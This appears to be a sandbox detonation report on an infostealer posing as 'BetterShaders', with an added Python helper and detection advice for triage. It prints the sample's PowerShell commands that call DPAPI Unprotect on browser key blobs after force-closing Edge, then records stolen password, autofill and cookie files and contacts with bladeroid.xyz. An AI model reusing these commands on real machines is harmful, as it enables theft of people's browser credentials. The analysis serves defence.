2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
132s
Max time network
110s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4812 wrote to memory of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4812 wrote to memory of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4812 wrote to memory of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1272 -ip 1272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 628
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 52.111.227.14:443 | N/A | tcp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20240221-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 220
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.162.46.104.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
151s
Max time network
159s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM msedge.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2140,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Passwords.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_cookies.zip\Microsoft_Default.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Autofills.txt
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\HideUndo.ram"
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:8
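The two powershell.exe command lines in the process list above pass complete DPAPI blobs to ProtectedData::Unprotect with the CurrentUser scope, right after tasklist and a forced taskkill of msedge.exe and right before Passwords.txt, Autofills.txt and a cookies archive appear in Temp. The blobs are worth decoding rather than just flagging: the header tells you which master key they belong to and what the application labelled them. The helper below is an added example written for this report; it is not code from the sample, from the sandbox, or from any browser project. It assumes the CryptProtectData blob layout as described by public DPAPI research (the dpapick and mimikatz structure definitions: version, provider GUID, master-key version and GUID, flags, UTF-16 description, cipher, salt, hash, HMAC key, ciphertext, signature) and the CALG_* and CRYPTPROTECT_* constants from wincrypt.h; the function and field names (extract_blobs, parse_dpapi_blob, triage, blob_len, and so on) are mine. Its input is the two logged powershell.exe command lines copied verbatim from the list above.

```python
"""Added triage helper: pull the DPAPI blobs out of logged
ProtectedData::Unprotect command lines and decode their headers."""
import re
import struct
import uuid

# Every CryptProtectData blob starts with version 1 and this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# Algorithm identifiers (wincrypt.h CALG_* values) that appear in blob headers.
ALG_NAMES = {0x6603: "CALG_3DES", 0x660E: "CALG_AES_128", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800E: "CALG_SHA_512"}

# wincrypt.h CRYPTPROTECT_* flag bits recorded in the blob header.
FLAG_NAMES = {0x1: "UI_FORBIDDEN", 0x4: "LOCAL_MACHINE", 0x10: "AUDIT"}

# Matches the PowerShell idiom the sample uses: Unprotect([byte[]]@(1,0,0,0,...), ...).
UNPROTECT_RE = re.compile(
    r"ProtectedData\]::Unprotect\(\s*\[byte\[\]\]@\(([0-9,\s]+)\)", re.IGNORECASE)


def extract_blobs(cmdline):
    """Return each byte[] literal handed to ProtectedData::Unprotect in one command line."""
    return [bytes(int(n) for n in m.group(1).split(","))
            for m in UNPROTECT_RE.finditer(cmdline)]


def parse_dpapi_blob(blob):
    """Walk the blob layout used by public DPAPI tooling (dpapick, mimikatz)."""
    off = 0

    def u32():
        nonlocal off
        (value,) = struct.unpack_from("<I", blob, off)
        off += 4
        return value

    def take(n):
        nonlocal off
        chunk = blob[off:off + n]
        if len(chunk) != n:
            raise ValueError("truncated DPAPI blob")
        off += n
        return chunk

    version = u32()
    provider = uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    mk_version = u32()
    master_key = uuid.UUID(bytes_le=take(16))     # which user master key can decrypt it
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")  # caller-supplied label
    alg_crypt, key_bits = u32(), u32()
    salt = take(u32())
    take(u32())                                   # strong-key field, empty in practice
    alg_hash, hash_bits = u32(), u32()
    hmac_key = take(u32())
    data = take(u32())                            # the actual ciphertext
    sign = take(u32())                            # HMAC over the blob
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI signature")
    return {
        "master_key_guid": str(master_key),
        "master_key_version": mk_version,
        "flags": [name for bit, name in FLAG_NAMES.items() if flags & bit],
        "description": description,
        "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "key_bits": key_bits,
        "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "hash_bits": hash_bits,
        "salt_len": len(salt),
        "hmac_key_len": len(hmac_key),
        "ciphertext_len": len(data),
        "signature_len": len(sign),
    }


def triage(cmdlines):
    """Parse every distinct blob across a set of logged command lines. The cmd.exe
    wrapper and its powershell.exe child log the same literal, so dedupe by bytes."""
    seen, findings = set(), []
    for line in cmdlines:
        for blob in extract_blobs(line):
            if blob in seen:
                continue
            seen.add(blob)
            info = parse_dpapi_blob(blob)
            info["blob_len"] = len(blob)
            findings.append(info)
    return findings


# Sample input: the two powershell.exe command lines from the process list above.
LOGGED_CMDLINES = [
    "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')",
    "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')",
]

if __name__ == "__main__":
    for finding in triage(LOGGED_CMDLINES):
        print(finding)
```

Run against the two lines above, both blobs parse as AES-256 / SHA-512 blobs bound to the same per-user master key (b88ae5b2-36bf-4712-b730-1f68e304ddb2), each carrying 48 bytes of ciphertext, which is the size of a 32-byte secret plus one padding block under AES-CBC and is consistent with a Chromium-family os_crypt encrypted_key being unwrapped. The second blob carries the description "Microsoft Edge" and the AUDIT flag; the first has an empty description and no flags, so the page does not say which application it came from. For detection, the useful heuristic is the shape of the command line rather than its bytes: a process that is not a browser spawning cmd.exe or powershell.exe with ProtectedData]::Unprotect and a multi-hundred-element [byte[]]@( literal, shortly after a taskkill of a browser image, is the credential-theft pattern this report records, and feeding Sysmon Event ID 1 or Security 4688 command lines through extract_blobs() will surface it with the literal intact.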
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bladeroid.xyz | udp |
| US | 8.8.8.8:53 | ipapi.co | udp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.26.8.44:443 | ipapi.co | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 8.8.8.8:53 | 240.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\57c9bfb3-4a0d-4cb3-a484-dd0ed82883c5.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfafqys2.vmm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1592-14-0x000002D4EB740000-0x000002D4EB762000-memory.dmp
memory/1592-17-0x000002D4EBB40000-0x000002D4EBB90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 68d80cc2ac40ea9e5c7297fba6623c45 |
| SHA1 | 05908daef7414f753fa6006082c42485002a7da8 |
| SHA256 | 3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96 |
| SHA512 | 2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6 |
C:\Users\Admin\AppData\Local\Temp\Passwords.txt
| MD5 | 4d6eadc6c0ff2a52aae242512cface64 |
| SHA1 | 58585d6d017a8c2a597d7b88e98825c59f3368c5 |
| SHA256 | d177217ce74775a6fdc5d0880f58da76105315c7bf732892b5e11e19c0175e09 |
